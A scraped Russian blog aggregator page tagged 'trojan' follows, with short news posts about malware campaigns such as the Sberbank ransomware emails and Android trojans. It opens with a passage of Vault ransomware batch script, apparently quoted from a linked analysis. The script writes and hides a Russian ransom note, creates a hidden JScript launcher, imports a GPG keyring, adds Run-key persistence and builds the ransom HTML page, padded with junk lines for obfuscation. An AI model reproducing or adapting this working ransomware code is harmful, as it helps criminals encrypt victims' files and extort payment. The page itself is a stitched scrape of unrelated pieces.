echo После получения ключа, Вы можете восстановить файлы используя наше ПО с открытым исходным кодом или же безопасно использовать своё ПО>> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo ДОПОЛНИТЕЛЬНО>> "%temp%\VAULT.txt"
echo WabrUswUrafuThezUzusw6gEgephubAS >nul
echo 6AnutaprUstura2echaNu7wujEbrusp5 >nul
echo a^) Вы не сможете восстановить файлы без уникального ключа ^(который безопасно хранится на нашем сервере^)>> "%temp%\VAULT.txt"
echo b^) Если Вы не можете найти Ваш VAULT.KEY, поищите во временной папке TEMP >> "%temp%\VAULT.txt"
echo WabrUswUrafuThezUzusw6gEgephubAS >nul
echo 6AnutaprUstura2echaNu7wujEbrusp5 >nul
echo c^) Ваша стоимость восстановления не окончательная, пишите в чат>> "%temp%\VAULT.txt"
echo.>> "%temp%\VAULT.txt"
echo WabrUswUrafuThezUzusw6gEgephubAS >nul
echo 6AnutaprUstura2echaNu7wujEbrusp5 >nul
echo Дата блокировки: %date% ^(%time:~0,5%^)>> "%temp%\VAULT.txt"
copy /y "%temp%\VAULT.txt" "%userprofile%\Desktop\vault.txt"
attrib +h "%userprofile%\Desktop\vault.txt"
echo WabrUswUrafuThezUzusw6gEgephubAS >nul

echo CNKM5uZisBFr8E8ZvA92aYEyCErjpEnbT3MtueqFD3AJPcEcrb
echo RobfE3bEJP9vMkgaekFEjsqvlEaHscq14JcFSZlrQyjrKNyTge
echo 6AnutaprUstura2echaNu7wujEbrusp5 >nul
echo var cdp="%%TeMp%%\\4c2e533d.cmd";var WshShell=CreateObject("WScript.Shell");cdp=WshShell.ExpandEnvironmentStrings(cdp);function CreateObject(fq){return new ActiveXObject(fq)}function xx(cdp){WshShell.Run(cdp,0,0);}xx(''+cdp+'');>> "%temp%\e33176c1.js"
echo WabrUswUrafuThezUzusw6gEgephubAS >nul
echo 6AnutaprUstura2echaNu7wujEbrusp5 >nul
"%TEMP%\gpg.exe" --import "%TEMP%\pubring.gpg"
echo WabrUswUrafuThezUzusw6gEgephubAS >nul
echo 6AnutaprUstura2echaNu7wujEbrusp5 >nul
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "e1a04a3c" /t REG_SZ /f /d "notepad %temp%\VAULT.txt"
echo jeg3pHEnaphEcrasTaFREstAkAc5uXEw >nul
echo 8resWe46Dra2ejed5EgefracraVUweth >nul
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ed3f074a" /t REG_SZ /f /d "attrib -h %userprofile%\Desktop\vault.txt"
echo jeg3pHEnaphEcrasTaFREstAkAc5uXEw >nul
echo 8resWe46Dra2ejed5EgefracraVUweth >nul
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "58f139df" /t REG_SZ /f /d "wscript //B //Nologo %temp%\e33176c1.js"
call "%temp%\4c2e533d.cmd"
echo jeg3pHEnaphEcrasTaFREstAkAc5uXEw >nul
echo 8resWe46Dra2ejed5EgefracraVUweth >nul
echo ^^^^>^body{cursor:default;background-color:#E7E7E7;margin:0;font-family:"HelveticaNeue-Light","Helvetica Neue Light","Helvetica Neue",Helvetica,Arial,sans-serif;text-align:center;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABoAAAAaAgMAAADUJKRdAAAACVBMVEXs7Ozv7+/6+vqH/Ct2AAAAW0lEQVQI11WOsQ2DABADv8gAGQFd4SJTZARGQC5cMBX1T0mD4ClP9lmutf71qW/t3d19VBLDcrNR7KV+F4Mx28OKyMzf/UDINvYADR9A08cwfcnjDwmarOBn7wSqEUpFZuJdBQAAAABJRU5ErkJggg==)}.vaustyle{margin:10px;height:520px;width:1100px}.sc{margin:10px 150px;font-size:40px;width:900px;padding:20px;background-color:#7a7a7a;color:#FF4C4C;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAJ0lEQVR42mXMsQkAAAzDMH+S/69M6VAoeAgGDQFIW/4QQARbwaF+B3+SPGAo8blgAAAAAElFTkSuQmCC)}.briefly{position:absolute;left:50px;width:480px}.detailed{display:inline-block;margin-left:530px;width:660px}.bti{background-color:#DFDFDF;color:#555;font-size:28px;padding:10px}hr{width:90%%}.sced{margin-top:15px;text-align:center;font-size:27px;height:220px;padding:20px;background-color:#6a6a6a;line-height:1.5;color:#EAEAEA;background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAUAAAAFCAYAAACNbyblAAAAJ0lEQVR42mXMsQkAAAzDMH+S/69M6VAoeAgGDQFIW/4QQARbwaF+B3+SPGAo8blgAAAAAElFTkSuQmCC)}form{display:inline}.dbutt{margin-left:2px;font-size:16px;font-weight:500;border:none;background-color:#9f9f9f;color:#EEE;cursor:pointer}.footer{text-align:left;position:relative;width:600px;margin:2px 2px 2px 45px;height:16px;font-size:15px;background-color:#CFCFCF;color:#444;padding:6px}.fnl{font-size:21px}^^^>^Vault Notification^^

http://habrahabr.ru/post/266077/

Метки:   Комментарии (0)КомментироватьВ цитатник или сообщество
shavaardan

Новость! Отмечен новый троян, взламывающий блоги

Вторник, 01 Сентября 2015 г. 21:59 (ссылка)


5852975_virus (700x420, 160Kb)

Метки:   Комментарии (0)КомментироватьВ цитатник или сообщество
enmaster1

Поддельная Windows 10 с вирусом в эл.письме, Осторожно!

Понедельник, 03 Августа 2015 г. 16:00 (ссылка)
spec-komp.com/news/ne_popad...?_utl_t=li

Поддельная Windows 10 с вирусом в эл.письме, Осторожно!

Метки:   Комментарии (0)КомментироватьВ цитатник или сообщество
avtobakero

Троян в Google Play распространяется через подделки популярных игр

Понедельник, 27 Июля 2015 г. 12:52 (ссылка)
gazeta.ru/tech/news/2015/07...2129.shtml


Троян Android/Clicker распространяется через подделки известных мобильных приложений, таких, как Dubsmash 2, Clash of Clans 2, Subway Surfers 2, Subway Surfers 3, Minecraft 3 и другие, сообщает антивирусная компания ESET в своем пресс-релизе.

Комментарии (0)КомментироватьВ цитатник или сообщество
руда_стевряка

Внимание! Атака на Сбербанк

Суббота, 25 Июля 2015 г. 06:51 (ссылка)

Точнее, не на сам Сбер, а на компьютеры его клиентов.
Сама атака началась еще 21-22 июля на белорусских пользователей, о чем оперативно сообщили белорусские сми. 23 числа хакеры перекинулись на пользователей РФ:

http://www.cnews.ru/top/2015/07/24/klienty_sberban...y_hakeramivymogatelyami_597914



Среди тех, кто получал письма якобы от коллекторского отдела Сбербанка, были не только клиенты банка, но и люди, давно прекратившие финансовые отношения с учреждением. А нынешние клиенты отмечали, что взломщики использовали устаревшие адреса почты. Возможно, имел место не взлом баз Сбербанка, а слив со стороны мобильных операторов или другой путь к персональной информации.

Чем опасна именно эта атака?
В прикрепленных файлах содержится Trojan-Ransom.Win32.Snocry.wi, который действует по принципу баннера:



И есть "ма-а-аленькая" проблемка: конкретно этот троян не лечится. Он шифрует все файлы на компьютере пользователя в хитро-мудрый формат, дешифровка которого без ключа автора вируса невозможна - так утверждают представители крупных компаний-поставщиков антивирусного ПО, в частности, представители "Доктора Вэб". Единственный способ избавиться от трояна - снести и переустановить ОС... хорошо, если у вас есть резервная копия файлов. Если нет - можете про них забыть.
К слову, мошенники требуют за ключ от 200 до 400 долларов

А посему советую не открывать письма и смс от Сбербанка. А если есть вопросы - не полениться и выяснить лично или по телефону.

Метки:   Комментарии (2)КомментироватьВ цитатник или сообщество
Ла-почка

Android-троян загружает вредоносные приложения под видом входящих сообщений

Понедельник, 22 Июня 2015 г. 15:47 (ссылка)
ferra.ru/ru/techlife/news/2...57-origin/



Android-троян загружает вредоносные приложения под видом входящих сообщенийСпециалисты компании «Доктор Веб» обнаружили очередного мобильного троянца, который демонстрирует различные рекламные уведомления, ведущие к загрузке нежелательного и вредоносного ПО.

Читать далее...
Метки:   Комментарии (0)КомментироватьВ цитатник или сообщество

Следующие 30  »

<троян - Самое интересное в блогах

Страницы: [1] 2 3 ..
.. 10

LiveInternet.Ru Ссылки: на главную|почта|знакомства|одноклассники|фото|открытки|тесты|чат
О проекте: помощь|контакты|разместить рекламу|версия для pda